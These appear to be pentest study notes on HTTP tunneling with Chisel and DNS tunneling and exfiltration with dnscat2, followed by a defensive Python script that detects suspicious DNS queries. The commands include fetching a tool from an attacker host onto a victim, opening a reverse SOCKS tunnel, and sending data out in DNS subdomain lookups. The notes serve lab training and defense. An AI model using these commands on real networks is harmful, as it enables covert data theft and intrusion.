HTTP and DNS Tunneling

Sometimes Deep Packet Inspection will force us into tunnelling our data through HTTP (SSH tunnels can be prohibited).

Tunneling with Chisel

Encapsulating a data stream within the HTTP protocol.

In order to use Chisel you have to set up a Chisel server (kali) and a Chisel client (victim).

Download the chisel binary from here: https://github.com/jpillora/chisel/releases

Reverse port forwarding

Similar to SSH remote port forwarding

Host the chisel file (kali):

python3 -m http.server 80

Fetch the chisel binary (on our jumphost):

wget <KALI_IP>/chisel -O /tmp/chisel && chmod +x /tmp/chisel

Execute the client chisel:

chisel client <KALI_IP>:<KALI_PORT> R:socks

Check that the client connects back to kali (kali):

sudo tcpdump -nvvvXi tun0 tcp port <PORT>

Run chisel server:

chisel server --port <PORT> --reverse

Check that the SOCKS port 1080 is listening (kali):

ss -ntplu

DNS Tunneling

Data exfiltration / infiltration

DNS Server:

Check DNS status:

resolvectl status

Flush the local DNS cache:

resolvectl flush-caches

Set up traffic listener:

sudo tcpdump -i <NETWORK_INTERFACE> udp port 53

Client:

Test resolving names with nslookup:

nslookup <name.com>

Query a DNS server directly by appending the server address:

nslookup exfiltrated-data.feline.corp 192.168.50.64

You can exfiltrate data to a DNS server you control by dividing the data into small chunks and making requests like:

nslookup <data>.name.com

You can infiltrate data (from the DNS server) using a TXT record:

nslookup -type=txt www.name.corp

DNS Tunneling with dnscat2

Set up dnscat2 (server):

dnscat2-server <name.com>

Connect to dnscat2 (client):

./dnscat <name.com>

Interact with a session window (in the dnscat2 server console):

windows -i 1

Tunnelling command (inside the session):

listen 127.0.0.1:<LOCAL_PORT> <REMOTE_IP>:<REMOTE_PORT>
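As an added defender-side example (not part of the original notes), the following Python script applies simple heuristics to a constructed DNS query log to spot the traffic patterns the techniques above produce: very long or high-entropy leftmost labels (chunked data in subdomains, dnscat2 sessions), many distinct subdomains under one zone, and TXT lookups. The log format, the thresholds and the sample lines are assumptions.

```python
import math
from collections import defaultdict

# Constructed sample query log (assumption, not from the page):
# "<epoch> <client_ip> <qtype> <qname>", one query per line.
SAMPLE_LOG = """\
1714000000 192.168.50.10 A www.example.com
1714000001 192.168.50.10 A a1b2c3d4e5f60718293a4b5c6d7e.name.com
1714000002 192.168.50.10 A 0f1e2d3c4b5a69788796a5b4c3d2.name.com
1714000003 192.168.50.10 A 5566778899aabbccddeeff001122.name.com
1714000004 192.168.50.10 A deadbeefcafef00d0123456789ab.name.com
1714000005 192.168.50.10 TXT www.name.corp
1714000006 192.168.50.11 A mail.example.com
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def registered_domain(qname: str) -> str:
    """Naive zone owner: the last two labels (no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def analyze(log_text: str, max_label_len: int = 24,
            min_entropy: float = 3.0, unique_threshold: int = 3):
    """Return (reason, subject, detail) tuples for suspicious queries."""
    labels_per_zone = defaultdict(set)
    findings = []
    for line in log_text.splitlines():
        _ts, client, qtype, qname = line.split()
        first = qname.split(".")[0]          # leftmost label carries the payload
        labels_per_zone[registered_domain(qname)].add(first)
        if len(first) > max_label_len:
            findings.append(("long-label", client, qname))
        elif shannon_entropy(first) >= min_entropy:
            findings.append(("high-entropy-label", client, qname))
        if qtype == "TXT":                   # TXT answers can carry inbound data
            findings.append(("txt-query", client, qname))
    # Many distinct subdomains under one zone: chunked data or a dnscat2 session
    for zone, labels in labels_per_zone.items():
        if len(labels) >= unique_threshold:
            findings.append(("many-unique-subdomains", zone, str(len(labels))))
    return findings
```

Tune the thresholds against a baseline of your own resolver logs; TXT lookups alone are routine (SPF, DKIM), so treat that signal as supporting evidence rather than an alert on its own.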
